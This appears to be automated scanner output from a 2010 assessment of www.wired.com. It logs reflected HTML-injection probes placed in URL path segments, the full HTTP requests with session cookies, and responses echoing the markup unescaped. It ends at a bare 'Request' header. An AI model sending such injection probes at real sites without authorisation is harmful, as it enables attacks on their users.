This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music/news70d39"><a>b304160c724/2004/04/63263 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:36 GMT Date: Sun, 21 Nov 2010 23:07:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_music c_news70d39"><a>b304160c724"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f72e"><a>b56d3b0469f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment8f72e"><a>b56d3b0469f/music/news/2005/07/68124 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:29 GMT Date: Sun, 21 Nov 2010 23:07:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment8f72e"><a>b56d3b0469f ss_music c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8292"><a>527abd9bf12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/musicd8292"><a>527abd9bf12/news/2005/07/68124 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:02 GMT Date: Sun, 21 Nov 2010 23:08:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_musicd8292"><a>527abd9bf12 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ab"><a>79fd2601542 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music/news794ab"><a>79fd2601542/2005/07/68124 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:22 GMT Date: Sun, 21 Nov 2010 23:08:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_music c_news794ab"><a>79fd2601542"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0dc"><a>6d583e3f06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment7e0dc"><a>6d583e3f06/theweb HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29335 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Sun, 21 Nov 2010 23:11:12 GMT Date: Sun, 21 Nov 2010 23:07:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment7e0dc"><a>6d583e3f06 ss_theweb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52ebb"><a>01d211d6eae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/theweb52ebb"><a>01d211d6eae HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29337 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:02 GMT Date: Sun, 21 Nov 2010 23:08:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_theweb52ebb"><a>01d211d6eae"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f0b"><a>06f0bc5b429 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets24f0b"><a>06f0bc5b429 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29331 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:14:33 GMT Date: Mon, 22 Nov 2010 01:10:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets24f0b"><a>06f0bc5b429"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d3c4"><a>44e9ad792ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets5d3c4"><a>44e9ad792ff/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29332 Vary: Accept-Encoding Cache-Control: max-age=224 Expires: Sun, 21 Nov 2010 20:17:08 GMT Date: Sun, 21 Nov 2010 20:13:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets5d3c4"><a>44e9ad792ff"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f24"><a>01629cf0b9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets20f24"><a>01629cf0b9a/digitalcameras HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Sun, 21 Nov 2010 23:11:26 GMT Date: Sun, 21 Nov 2010 23:07:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets20f24"><a>01629cf0b9a ss_digitalcameras"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0fc"><a>827ec64b19b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/digitalcamerascb0fc"><a>827ec64b19b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:57 GMT Date: Sun, 21 Nov 2010 23:07:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_digitalcamerascb0fc"><a>827ec64b19b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bfac"><a>5cabf0c5d32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets4bfac"><a>5cabf0c5d32/displays HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:11:43 GMT Date: Sun, 21 Nov 2010 23:07:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets4bfac"><a>5cabf0c5d32 ss_displays"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db025"><a>555d174deea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/displaysdb025"><a>555d174deea HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:07 GMT Date: Sun, 21 Nov 2010 23:08:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_displaysdb025"><a>555d174deea"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba86"><a>e8f52bb4221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgetsdba86"><a>e8f52bb4221/gadgetreviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:11:57 GMT Date: Sun, 21 Nov 2010 23:07:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgetsdba86"><a>e8f52bb4221 ss_gadgetreviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e399"><a>cebb494f95a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/gadgetreviews1e399"><a>cebb494f95a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:32 GMT Date: Sun, 21 Nov 2010 23:08:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_gadgetreviews1e399"><a>cebb494f95a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d93"><a>5fa7d6b4d51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgetsa8d93"><a>5fa7d6b4d51/mac HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Sun, 21 Nov 2010 23:11:41 GMT Date: Sun, 21 Nov 2010 23:08:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgetsa8d93"><a>5fa7d6b4d51 ss_mac"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 821e8"><a>04b40dd3412 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/mac821e8"><a>04b40dd3412 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=551 Expires: Sun, 21 Nov 2010 23:17:48 GMT Date: Sun, 21 Nov 2010 23:08:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_mac821e8"><a>04b40dd3412"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90641"><a>ba5864f027 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets90641"><a>ba5864f027/miscellaneous HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29360 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:03 GMT Date: Sun, 21 Nov 2010 23:08:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets90641"><a>ba5864f027 ss_miscellaneous"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae2a5"><a>4df9c3f8bcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/miscellaneousae2a5"><a>4df9c3f8bcc HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:38 GMT Date: Sun, 21 Nov 2010 23:08:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_miscellaneousae2a5"><a>4df9c3f8bcc"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c6cc"><a>2ec7c30f53a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
